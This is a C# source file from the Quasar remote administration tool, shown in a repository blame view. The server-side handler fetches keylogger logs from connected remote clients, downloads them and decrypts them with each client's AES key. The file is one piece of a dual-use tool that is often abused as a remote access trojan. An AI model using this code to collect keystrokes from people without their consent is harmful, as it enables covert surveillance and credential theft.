Quasar/Quasar.Server/Messages/KeyloggerHandler.cs

166 lines
5.7 KiB
C#
Raw Permalink Normal View History

2018-10-05 21:58:09 +00:00
using Quasar.Common.Helpers;
2018-09-19 15:36:30 +00:00
using Quasar.Common.Messages;
2020-05-26 20:43:49 +00:00
using Quasar.Common.Models;
2018-09-19 15:36:30 +00:00
using Quasar.Common.Networking;
2020-05-26 20:43:49 +00:00
using Quasar.Server.Models;
2018-10-04 19:49:24 +00:00
using Quasar.Server.Networking;
using System;
2018-10-05 21:58:09 +00:00
using System.IO;
2018-09-19 15:36:30 +00:00
2018-10-04 19:49:24 +00:00
namespace Quasar.Server.Messages
2018-09-19 15:36:30 +00:00
{
/// <summary>
/// Handles messages for the interaction with the remote keylogger.
/// </summary>
public class KeyloggerHandler : MessageProcessorBase<string>, IDisposable
2018-09-19 15:36:30 +00:00
{
/// <summary>
/// The client which is associated with this keylogger handler.
/// </summary>
private readonly Client _client;
/// <summary>
2020-05-26 20:43:49 +00:00
/// The file manager handler used to retrieve keylogger logs from the client.
2018-09-19 15:36:30 +00:00
/// </summary>
2020-05-26 20:43:49 +00:00
private readonly FileManagerHandler _fileManagerHandler;
/// <summary>
/// The remote path of the keylogger logs directory.
/// </summary>
private string _remoteKeyloggerDirectory;
/// <summary>
/// The amount of all running log transfers.
/// </summary>
private int _allTransfers;
/// <summary>
/// The amount of all completed log transfers.
/// </summary>
private int _completedTransfers;
2018-09-19 15:36:30 +00:00
/// <summary>
/// Initializes a new instance of the <see cref="KeyloggerHandler"/> class using the given client.
/// </summary>
/// <param name="client">The associated client.</param>
public KeyloggerHandler(Client client) : base(true)
{
_client = client;
2020-05-26 20:43:49 +00:00
_fileManagerHandler = new FileManagerHandler(client, "Logs\\");
_fileManagerHandler.DirectoryChanged += DirectoryChanged;
_fileManagerHandler.FileTransferUpdated += FileTransferUpdated;
_fileManagerHandler.ProgressChanged += StatusUpdated;
2020-05-26 20:43:49 +00:00
MessageHandler.Register(_fileManagerHandler);
2018-09-19 15:36:30 +00:00
}
/// <inheritdoc />
2020-05-26 20:43:49 +00:00
public override bool CanExecute(IMessage message) => message is GetKeyloggerLogsDirectoryResponse;
2018-09-19 15:36:30 +00:00
/// <inheritdoc />
public override bool CanExecuteFrom(ISender sender) => _client.Equals(sender);
/// <inheritdoc />
public override void Execute(ISender sender, IMessage message)
{
switch (message)
{
2020-05-26 20:43:49 +00:00
case GetKeyloggerLogsDirectoryResponse logsDirectory:
Execute(sender, logsDirectory);
2018-09-19 15:36:30 +00:00
break;
}
}
/// <summary>
/// Retrieves the keylogger logs and begins downloading them.
/// </summary>
public void RetrieveLogs()
{
2020-05-26 20:43:49 +00:00
_client.Send(new GetKeyloggerLogsDirectory());
2018-09-19 15:36:30 +00:00
}
2020-05-26 20:43:49 +00:00
private void Execute(ISender client, GetKeyloggerLogsDirectoryResponse message)
2018-09-19 15:36:30 +00:00
{
2020-05-26 20:43:49 +00:00
_remoteKeyloggerDirectory = message.LogsDirectory;
client.Send(new GetDirectory {RemotePath = _remoteKeyloggerDirectory});
}
2020-05-25 20:38:41 +00:00
2020-05-26 20:43:49 +00:00
private string GetDownloadProgress(int allTransfers, int completedTransfers)
{
decimal progress = Math.Round((decimal)((double)completedTransfers / (double)allTransfers * 100.0), 2);
return $"Downloading...({progress}%)";
}
2018-09-19 15:36:30 +00:00
private void StatusUpdated(object sender, string value)
{
// called when directory does not exist or access is denied
OnReport($"No logs found ({value})");
}
2020-05-26 20:43:49 +00:00
private void DirectoryChanged(object sender, string remotePath, FileSystemEntry[] items)
{
if (items.Length == 0)
2018-09-19 15:36:30 +00:00
{
OnReport("No logs found");
2018-09-19 15:36:30 +00:00
return;
}
2020-05-26 20:43:49 +00:00
_allTransfers = items.Length;
_completedTransfers = 0;
OnReport(GetDownloadProgress(_allTransfers, _completedTransfers));
2018-09-19 15:36:30 +00:00
2020-05-26 20:43:49 +00:00
foreach (var item in items)
{
// don't escape from download directory
if (FileHelper.HasIllegalCharacters(item.Name))
{
// disconnect malicious client
_client.Disconnect();
return;
}
2018-09-19 15:36:30 +00:00
2020-05-26 20:43:49 +00:00
_fileManagerHandler.BeginDownloadFile(Path.Combine(_remoteKeyloggerDirectory, item.Name), item.Name + ".html", true);
}
}
2018-09-19 15:36:30 +00:00
2020-05-26 20:43:49 +00:00
private void FileTransferUpdated(object sender, FileTransfer transfer)
{
if (transfer.Status == "Completed")
2018-09-19 15:36:30 +00:00
{
try
{
2020-05-26 20:43:49 +00:00
_completedTransfers++;
File.WriteAllText(transfer.LocalPath, FileHelper.ReadLogFile(transfer.LocalPath, _client.Value.AesInstance));
OnReport(_allTransfers == _completedTransfers
? "Successfully retrieved all logs"
: GetDownloadProgress(_allTransfers, _completedTransfers));
2018-09-19 15:36:30 +00:00
}
catch (Exception)
2018-09-19 15:36:30 +00:00
{
2020-05-26 20:43:49 +00:00
OnReport("Failed to decrypt and write logs");
2018-09-19 15:36:30 +00:00
}
2020-05-26 20:43:49 +00:00
}
2018-09-19 15:36:30 +00:00
}
/// <summary>
/// Disposes all managed and unmanaged resources associated with this message processor.
/// </summary>
public void Dispose()
{
Dispose(true);
GC.SuppressFinalize(this);
}
protected virtual void Dispose(bool disposing)
2018-09-19 15:36:30 +00:00
{
2020-05-26 20:43:49 +00:00
if (disposing)
{
MessageHandler.Unregister(_fileManagerHandler);
_fileManagerHandler.ProgressChanged -= StatusUpdated;
2020-05-26 20:43:49 +00:00
_fileManagerHandler.FileTransferUpdated -= FileTransferUpdated;
_fileManagerHandler.DirectoryChanged -= DirectoryChanged;
_fileManagerHandler.Dispose();
}
2018-09-19 15:36:30 +00:00
}
}
}